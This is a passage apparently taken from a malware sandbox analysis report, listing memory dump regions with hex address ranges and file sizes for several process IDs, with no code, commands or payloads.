      • memory/1860-198-0x0000000070560000-0x00000000705AC000-memory.dmp

        Filesize

        304KB

      • memory/1860-208-0x0000000007410000-0x00000000074B3000-memory.dmp

        Filesize

        652KB

      • memory/2092-166-0x00000000079B0000-0x0000000007A0C000-memory.dmp

        Filesize

        368KB

      • memory/2092-22-0x0000000007B20000-0x000000000819A000-memory.dmp

        Filesize

        6.5MB

      • memory/2092-43-0x00000000747C0000-0x0000000074F70000-memory.dmp

        Filesize

        7.7MB

      • memory/2092-42-0x0000000007630000-0x0000000007696000-memory.dmp

        Filesize

        408KB

      • memory/2092-40-0x0000000002650000-0x000000000265C000-memory.dmp

        Filesize

        48KB

      • memory/2092-41-0x00000000747C0000-0x0000000074F70000-memory.dmp

        Filesize

        7.7MB

      • memory/2092-5-0x0000000005150000-0x0000000005172000-memory.dmp

        Filesize

        136KB

      • memory/2092-39-0x00000000747CE000-0x00000000747CF000-memory.dmp

        Filesize

        4KB

      • memory/2092-18-0x0000000006130000-0x000000000614E000-memory.dmp

        Filesize

        120KB

      • memory/2092-21-0x0000000007420000-0x0000000007496000-memory.dmp

        Filesize

        472KB

      • memory/2092-4-0x00000000747C0000-0x0000000074F70000-memory.dmp

        Filesize

        7.7MB

      • memory/2092-20-0x0000000006520000-0x0000000006564000-memory.dmp

        Filesize

        272KB

      • memory/2092-0-0x00000000747CE000-0x00000000747CF000-memory.dmp

        Filesize

        4KB

      • memory/2092-23-0x00000000074C0000-0x00000000074DA000-memory.dmp

        Filesize

        104KB

      • memory/2092-2-0x0000000005280000-0x00000000058A8000-memory.dmp

        Filesize

        6.2MB

      • memory/2092-19-0x0000000006150000-0x000000000619C000-memory.dmp

        Filesize

        304KB

      • memory/2092-7-0x00000000058B0000-0x0000000005916000-memory.dmp

        Filesize

        408KB

      • memory/2092-6-0x00000000051F0000-0x0000000005256000-memory.dmp

        Filesize

        408KB

      • memory/2092-13-0x0000000005AE0000-0x0000000005E34000-memory.dmp

        Filesize

        3.3MB

      • memory/2092-3-0x00000000747C0000-0x0000000074F70000-memory.dmp

        Filesize

        7.7MB

      • memory/2092-167-0x0000000007A50000-0x0000000007B0C000-memory.dmp

        Filesize

        752KB

      • memory/2092-1-0x0000000004B30000-0x0000000004B66000-memory.dmp

        Filesize

        216KB

      • memory/2696-24-0x00000000747C0000-0x0000000074F70000-memory.dmp

        Filesize

        7.7MB

      • memory/2696-38-0x00000000747C0000-0x0000000074F70000-memory.dmp

        Filesize

        7.7MB

      • memory/2696-31-0x00000000747C0000-0x0000000074F70000-memory.dmp

        Filesize

        7.7MB

      • memory/2696-25-0x00000000747C0000-0x0000000074F70000-memory.dmp

        Filesize

        7.7MB

      • memory/4004-223-0x0000000070560000-0x00000000705AC000-memory.dmp

        Filesize

        304KB

      • memory/4068-154-0x0000000070560000-0x00000000705AC000-memory.dmp

        Filesize

        304KB

      • memory/4464-142-0x0000000007800000-0x0000000007811000-memory.dmp

        Filesize

        68KB

      • memory/4464-141-0x0000000007890000-0x0000000007926000-memory.dmp

        Filesize

        600KB

      • memory/4464-140-0x0000000007680000-0x000000000768A000-memory.dmp

        Filesize

        40KB

      • memory/4464-139-0x0000000007310000-0x00000000073B3000-memory.dmp

        Filesize

        652KB

      • memory/4464-138-0x0000000006870000-0x000000000688E000-memory.dmp

        Filesize

        120KB

      • memory/4464-128-0x0000000070560000-0x00000000705AC000-memory.dmp

        Filesize

        304KB

      • memory/4464-127-0x0000000006890000-0x00000000068C2000-memory.dmp

        Filesize

        200KB